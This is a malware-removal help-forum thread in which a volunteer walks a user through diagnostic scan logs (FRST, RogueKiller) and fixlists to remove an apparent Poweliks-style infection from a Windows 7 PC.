Task: {90409AC3-C03C-4F43-B367-6CDE097B0ADB} - System32\Tasks\SystemToolsDailyTest => C:\Program Files\PC-Doctor\uaclauncher.exe [2011-06-27] (PC-Doctor, Inc.)
Task: {96E7D4EB-E47C-4C6B-9C36-79FB1D4DA37C} - System32\Tasks\{BB0B37E5-22E3-2B40-FED2-DCC1CD9CCF9D} => C:\Windows\system32\bdhpl.dll/s "C:\Windows\system32\bdhpl.dll"
Task: {A653F635-2846-46C9-9F0D-D61FF57E3FBF} - System32\Tasks\TVT\ChangePWD => %RR%\rrcmd.exe
Task: {D50DCB71-264E-42D1-ADAA-9ABF4048AADA} - System32\Tasks\TVT\LaunchRnR => %RR%\rrcmd.exe
Task: {D854CD5A-DB3B-41A2-9D10-C6B6BFFECB0F} - System32\Tasks\TVT\UpdateRnR => %TVTCOMMON%\Scheduler\tvtsetsched.exe
Task: {F97F77C6-5696-408F-89F1-17A24D6C26F6} - System32\Tasks\PMTask => C:\Program Files (x86)\ThinkPad\Utilities\PWMIDTSV.EXE [2010-07-28] (Lenovo Group Limited)
Task: {FCCB621B-E6E2-41C3-B70A-323C5506BF37} - System32\Tasks\MCP => C:\Program Files (x86)\LENOVO\Message Center Plus\MCPLaunch.exe [2009-05-28] ()
Task: C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job => C:\Program Files\PC-Doctor\uaclauncher.exe
Task: C:\Windows\Tasks\SystemToolsDailyTest.job => C:\Program Files\PC-Doctor\uaclauncher.exe

==================== Loaded Modules (whitelisted) =============

2012-02-12 01:03 - 2005-03-12 01:07 - 00087040 ____N () C:\Windows\System32\pdfcmnnt.dll
2012-02-12 12:43 - 2010-03-03 09:45 - 00053248 ____N () C:\Program Files (x86)\D-Link\DWA-125 revA\ANIWConnService.exe
2011-11-26 19:50 - 2010-04-22 01:20 - 00177152 ____N () C:\Program Files\Lenovo\Lenovo Mouse Suite\PelService.exe
2014-08-11 11:49 - 2014-08-11 11:49 - 00159768 _____ () C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\loggingserver.exe
2013-09-23 08:34 - 2014-08-26 02:46 - 02640408 _____ () C:\Program Files (x86)\AVG Secure Search\vprot.exe
2011-11-26 19:50 - 2010-07-27 12:04 - 00029184 ____N () C:\Program Files (x86)\ThinkPad\Utilities\US\PWMRT64V.DLL
2011-11-26 19:50 - 2008-11-27 03:16 - 00018432 ____N () C:\Program Files\Lenovo\Lenovo Mouse Suite\FSRremoS.EXE
2011-11-26 19:50 - 2010-06-01 22:37 - 00228352 ____N () C:\Program Files\Lenovo\Lenovo Mouse Suite\PelElvDm.exe
2009-05-28 01:09 - 2009-05-28 01:09 - 00049976 ____N () C:\Program Files (x86)\LENOVO\Message Center Plus\MCPLaunch.exe
2012-02-28 11:20 - 2011-12-22 23:08 - 00051848 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\CodeLog.dll
2012-02-28 11:20 - 2008-11-25 17:18 - 01291264 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\libxml2.dll
2012-02-28 11:20 - 2004-10-05 03:08 - 00055808 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\zlib1.dll
2012-02-28 11:20 - 2011-12-22 23:08 - 00114312 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\ExchBackupSize.dll
2012-02-28 11:20 - 2011-12-22 23:08 - 00245896 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\ExImage.dll
2012-02-28 11:20 - 2011-12-22 23:08 - 00069768 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\EnumTapeDevice.dll
2012-02-28 11:20 - 2011-12-22 23:08 - 00064648 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\TbTapeBrowse.dll
2012-02-28 11:20 - 2011-12-23 15:15 - 00023176 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\AccountManager.dll
2012-02-28 11:20 - 2011-12-22 23:08 - 00093832 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\TBFireWall.dll
2011-11-26 19:46 - 2009-07-15 20:20 - 00077824 ____N () C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\DTMessageLib.dll
2014-08-11 11:49 - 2014-08-11 11:49 - 00519704 _____ () C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\log4cplusU.dll
2012-02-12 12:44 - 2012-02-12 12:44 - 00315392 ____N () C:\Program Files (x86)\D-Link\DWA-125 revA\ANPDApi.dll
2012-02-12 12:43 - 2010-03-19 19:14 - 00294912 ____N () C:\Program Files (x86)\D-Link\DWA-125 revA\WlanApp.dll
2013-12-09 13:21 - 2014-03-21 08:19 - 01603608 _____ () C:\Program Files (x86)\AVG Secure Search\TBAPI.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\49112529.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\49112529.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist Remote Support Customer => ""="Service"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

========================= Accounts: ==========================

Administrator (S-1-5-21-606911418-3109034106-3922174115-500 - Administrator - Enabled) => C:\Users\Administrator
Brenda (S-1-5-21-606911418-3109034106-3922174115-1001 - Limited - Enabled) => C:\Users\Brenda
Deborah (S-1-5-21-606911418-3109034106-3922174115-1000 - Administrator - Enabled) => C:\Users\Deborah
Diana (S-1-5-21-606911418-3109034106-3922174115-1053 - Administrator - Enabled)
Guest (S-1-5-21-606911418-3109034106-3922174115-501 - Limited - Disabled)
Nancy (S-1-5-21-606911418-3109034106-3922174115-1002 - Limited - Enabled)

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (11/02/2014 07:54:34 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/02/2014 04:01:11 PM) (Source: PC-Doctor) (EventID: 1) (User: )
Description: (7444) Asapi: (16:01:11:9740)(7444) S3LogPusherPlugin.Helper - Error -- 340 Unable to storage the test log to medium

Error: (11/02/2014 11:34:39 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: jscript9.dll, version: 11.0.9600.17344, time stamp: 0x541b85e6
Exception code: 0xc0000005
Fault offset: 0x00127417
Faulting process id: 0x25a0
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/02/2014 06:49:27 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094fbf
Faulting process id: 0x3580
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 10:59:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x0034cf7e
Faulting process id: 0x1388
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 10:29:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094765
Faulting process id: 0x2d2c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 10:21:33 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094765
Faulting process id: 0x19ec
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 10:17:52 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094765
Faulting process id: 0x35f0
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 10:08:37 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094fbf
Faulting process id: 0x25c8
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 09:48:55 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094fbf
Faulting process id: 0x27f8
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

System errors:
=============
Error: (11/02/2014 07:54:59 PM) (Source: VDS Basic Provider) (EventID: 1) (User: )
Description: Unexpected failure. Error code: D@01010004

Error: (11/02/2014 07:54:59 PM) (Source: VDS Basic Provider) (EventID: 1) (User: )
Description: Unexpected failure. Error code: D@01010004

Error: (11/02/2014 07:52:00 PM) (Source: volsnap) (EventID: 36) (User: )
Description: The shadow copies of volume C: were aborted because the shadow copy storage could not grow due to a user imposed limit.

Error: (11/02/2014 03:13:02 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (11/02/2014 02:14:16 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 252.

Error: (11/02/2014 10:51:11 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (11/02/2014 10:51:11 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (11/02/2014 10:50:51 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (11/02/2014 10:50:51 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (11/02/2014 10:50:31 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Microsoft Office Sessions:
=========================
Error: (11/02/2014 07:54:34 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/02/2014 04:01:11 PM) (Source: PC-Doctor) (EventID: 1) (User: )
Description: (7444) Asapi: (16:01:11:9740)(7444) S3LogPusherPlugin.Helper - Error -- 340 Unable to storage the test log to medium

Error: (11/02/2014 11:34:39 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7jscript9.dll11.0.9600.17344541b85e6c00000050012741725a001cff6ba0e99d2f5C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\jscript9.dll238b432a-62ae-11e4-bdb2-50e549719966

Error: (11/02/2014 06:49:27 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00094fbf358001cff6928245fff6C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll4bec0c79-6286-11e4-bdb2-50e549719966

Error: (11/01/2014 10:59:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd0034cf7e138801cff6512a52db7fC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll939db79e-6244-11e4-bdb2-50e549719966

Error: (11/01/2014 10:29:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd000947652d2c01cff64c0f49d66cC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll6afddfed-6240-11e4-bdb2-50e549719966

Error: (11/01/2014 10:21:33 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd0009476519ec01cff64be81db19bC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll57cde7a4-623f-11e4-bdb2-50e549719966

Error: (11/01/2014 10:17:52 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd0009476535f001cff64b5e350963C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dlld42ce66d-623e-11e4-bdb2-50e549719966

Error: (11/01/2014 10:08:37 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00094fbf25c801cff64a1ba4cb84C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll89126c6e-623d-11e4-bdb2-50e549719966

Error: (11/01/2014 09:48:55 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00094fbf27f801cff6475c4151c6C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dllc8feb523-623a-11e4-bdb2-50e549719966

==================== Memory info ===========================

Processor: Pentium® Dual-Core CPU E6600 @ 3.06GHz
Percentage of memory in use: 62%
Total physical RAM: 3551.17 MB
Available physical RAM: 1339.93 MB
Total Pagefile: 7100.52 MB
Available Pagefile: 4992.36 MB
Total Virtual: 8192 MB
Available Virtual: 8191.84 MB

==================== Drives ================================

Drive c: (Windows7_OS) (Fixed) (Total:221.95 GB) (Free:104.09 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive q: (Lenovo_Recovery) (Fixed) (Total:9.77 GB) (Free:2.1 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 232.9 GB) (Disk ID: B2D7266B)
Partition 1: (Active) - (Size=1.2 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=221.9 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=9.8 GB) - (Type=07 NTFS)

==================== End Of Log ============================



#8 shelf life

  • Malware Response Team

Posted 03 November 2014 - 05:31 PM

Hi,

OK, thanks for the info. We will use FRST once more like before.

Copy/paste what's below into Notepad and save it as fixlist.txt in the same directory FRST is in. Start FRST and click the Fix button. Post the log in your reply.

C:\Windows\System32\Tasks\{BB0B37E5-22E3-2B40-FED2-DCC1CD9CCF9D}
C:\Windows\system32\qzmktxy.dll
C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}

How Can I Reduce My Risk to Malware?


#9 dazedandconfused21

  • Topic Starter
  • Members

Posted 03 November 2014 - 06:50 PM

Good evening,

Here is the fixlog:

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 02-11-2014
Ran by Deborah at 2014-11-03 18:46:06 Run:2
Running from C:\Users\Deborah\Downloads
Loaded Profiles: Deborah & Brenda & Administrator (Available profiles: Deborah & Brenda & Administrator)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
C:\Windows\System32\Tasks\{BB0B37E5-22E3-2B40-FED2-DCC1CD9CCF9D}
C:\Windows\system32\qzmktxy.dll
C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
*****************

C:\Windows\System32\Tasks\{BB0B37E5-22E3-2B40-FED2-DCC1CD9CCF9D} => Moved successfully.
C:\Windows\system32\qzmktxy.dll => Moved successfully.

"C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}" directory move:

Could not move "C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\8afc49b02429a" => Scheduled to move on reboot.
Could not move "C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\mgqqsui.tmp" => Scheduled to move on reboot.
Could not move "C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\powercpl.dll" => Scheduled to move on reboot.
Could not move "C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}" directory. => Scheduled to move on reboot.

=> Result of Scheduled Files to move (Boot Mode: Normal) (Date&Time: 2014-11-03 18:49:48)<=

C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\8afc49b02429a => Is moved successfully.
C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\mgqqsui.tmp => Is moved successfully.
C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\powercpl.dll => Is moved successfully.
C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8} => Is moved successfully.

==== End of Fixlog ====



#10 shelf life

  • Malware Response Team

Posted 03 November 2014 - 08:46 PM

Hi,

Thanks for the info. Let's get one more download while we are at it just to make sure it all looks good.

Please download RogueKiller.exe and save to the desktop:

    http://www.bleepingcomputer.com/download/roguekiller/

    Close all windows and browsers
    Right-click the program and select 'Run as Admin'
    A prescan will start automatically.
    Once the prescan is done click on the Scan button
    When done press the Report button.
    Please copy and paste the results in your next reply.
    File>Exit to quit RogueKiller.
    Please don't delete anything just yet, not everything listed is malware.


How Can I Reduce My Risk to Malware?


#11 dazedandconfused21

  • Topic Starter
  • Members

Posted 03 November 2014 - 09:15 PM

Thank you. Here is the RogueKiller log:

RogueKiller V10.0.4.0 [Oct 29 2014] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : Deborah [Administrator]
Mode : Scan -- Date : 11/03/2014  21:15:24

¤¤¤ Processes : 1 ¤¤¤
[PUP] (SVC) vToolbarUpdater18.1.9 -- C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe[7] -> Stopped

¤¤¤ Registry : 19 ¤¤¤
[PUP] (X64) HKEY_CLASSES_ROOT\CLSID\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> Found
[PUP] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> Found
[PUP] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> Found
[PUP] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | vProt : "C:\Program Files (x86)\AVG Secure Search\vprot.exe"  -> Found
[PUP] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vToolbarUpdater18.1.9 (C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe) -> Found
[PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\vToolbarUpdater18.1.9 (C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe) -> Found
[PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\vToolbarUpdater18.1.9 (C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe) -> Found
[PUM.Policies] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0  -> Found
[PUM.Policies] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-606911418-3109034106-3922174115-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-606911418-3109034106-3922174115-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-606911418-3109034106-3922174115-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-606911418-3109034106-3922174115-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-606911418-3109034106-3922174115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-606911418-3109034106-3922174115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Found
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> Found
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Found
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> Found

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Not loaded [0xc000036b]) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: ST3250318AS ATA Device +++++
--- User ---
[MBR] ba1a3232ec89787f10919ba57328124e
[BSP] fe60953779c108c83b83ccd2d5a74b27 : Lenovo MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 1200 MB
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2459648 | Size: 227272 MB
2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 467914752 | Size: 10000 MB
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive1: HP Officejet 6500 E USB Device +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )



#12 shelf life

  • Malware Response Team

Posted 04 November 2014 - 06:22 PM

OK, thanks for the info. Don't see much to worry about in that log. If all is good on your end, you can get one more download that will delete all the tools we used and then delete itself:

    Please download Delfix.exe by Xplode and save it to your desktop:
    https://toolslib.net/downloads/viewdownload/2-delfix/
    Please start it and check the box next to "Remove disinfection tools" and click on the Run button.
    The tool will delete itself once it finishes.

Happy Safe Surfing out there.


How Can I Reduce My Risk to Malware?


#13 dazedandconfused21

  • Topic Starter
  • Members

Posted 04 November 2014 - 07:55 PM

Actually, while waiting for further instructions, the PC looks as though the Trojan reinstalled itself. I am getting fffsee.com blocking in Malwarebytes continuously now and there are many instances of dllhost*32 again in Task Manager. We have not used this PC yet since we were working with you to remove this vicious virus. Please advise what I can provide you for diags?



#14 shelf life

  • Malware Response Team

Posted 04 November 2014 - 10:04 PM

OK, well, I guess we were not quite done yet. This malware is pretty new on the scene and new in other ways also. Haven't had the chance to experience it on my malware machine yet.

"We have not used this PC yet"

Good, don't use it other than to download tools or run the scans. When it's not in use, make sure it has no network connectivity or power it off.

The best thing to do would be to start over with the logs again. There will be one new download to get.

So:

1) Run FRST again like you did before, but before hitting the Scan button put a checkmark next to addition.txt (under Optional Scan) and then click the Scan button. Please post the new logs, which you can find in the same directory FRST is in: C:\Users\Deborah\Downloads

This is the new download:

2) Please download AdwCleaner.exe to your desktop.

    Right-click on AdwCleaner.exe, select "Run as admin"
    Click on the Scan button
    Once the scan is done click on the Delete button
    Copy and paste the contents of the log file in your reply
    You can also find the log file at C:\AdwCleaner[R1].txt
    Exit AdwCleaner with the X (close) button. Click OK at the final prompt.

3) Please download RogueKiller.exe and save to the desktop:

    http://www.bleepingcomputer.com/download/roguekiller/

    Close all windows and browsers
    Right-click the program and select 'Run as Admin'
    A prescan will start automatically.
    Once the prescan is done click on the Scan button
    When done press the Report button.
    Please copy and paste the results in your next reply.
    File>Exit to quit RogueKiller.
    Please don't delete anything just yet, not everything listed is malware.

Let's start with those three tools for now and see what we have going on.

I will not be back online, so won't be able to reply for 16-18 hrs or so.


How Can I Reduce My Risk to Malware?


#15 dazedandconfused21

  • Topic Starter
  • Members

Posted 05 November 2014 - 11:00 AM

Thank you. Here are the logs. This PC is now alerting that AVG is blocking Poweliks, and we now have a second PC with this same issue.


Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 02-11-2014
Ran by Deborah (administrator) on ASSISTANT on 05-11-2014 10:40:13
Running from C:\Users\Deborah\Downloads
Loaded Profiles: Deborah & Brenda & Administrator (Available profiles: Deborah & Brenda & Administrator)
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Schneider Electric) C:\Program Files (x86)\APC\PowerChute Personal Edition\mainserv.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe
() C:\Program Files (x86)\D-Link\DWA-125 revA\ANIWConnService.exe
(CHENGDU YIWO Tech Development Co., Ltd) C:\Program Files (x86)\EaseUS\Todo Backup\bin\Agent.exe
(CHENGDU YIWO Tech Development Co., Ltd) C:\Program Files (x86)\EaseUS\Todo Backup\bin\GuardAgent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\AMT\LMS.exe
() C:\Program Files\Lenovo\Lenovo Mouse Suite\PelService.exe
(Lenovo) C:\Program Files (x86)\ThinkPad\Utilities\PWMDBSVC.exe
(Intel Corporation) C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Schneider Electric) C:\Program Files (x86)\APC\PowerChute Personal Edition\dataserv.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\System32\vds.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Primax Electronics Ltd.) C:\Program Files\Lenovo\Lenovo Mouse Suite\ICO.exe
(D-Link Corp.) C:\Program Files (x86)\D-Link\DWA-125 revA\AirGCFG.exe
(Wireless Service) C:\Program Files (x86)\D-Link\DWA-125 revA\WZCSLDR2.exe
(CHENGDU YIWO Tech Development Co., Ltd) C:\Program Files (x86)\EaseUS\Todo Backup\bin\EuWatch.exe
(CHENGDU YIWO Tech Development Co., Ltd) C:\Program Files (x86)\EaseUS\Todo Backup\bin\TrayNotify.exe
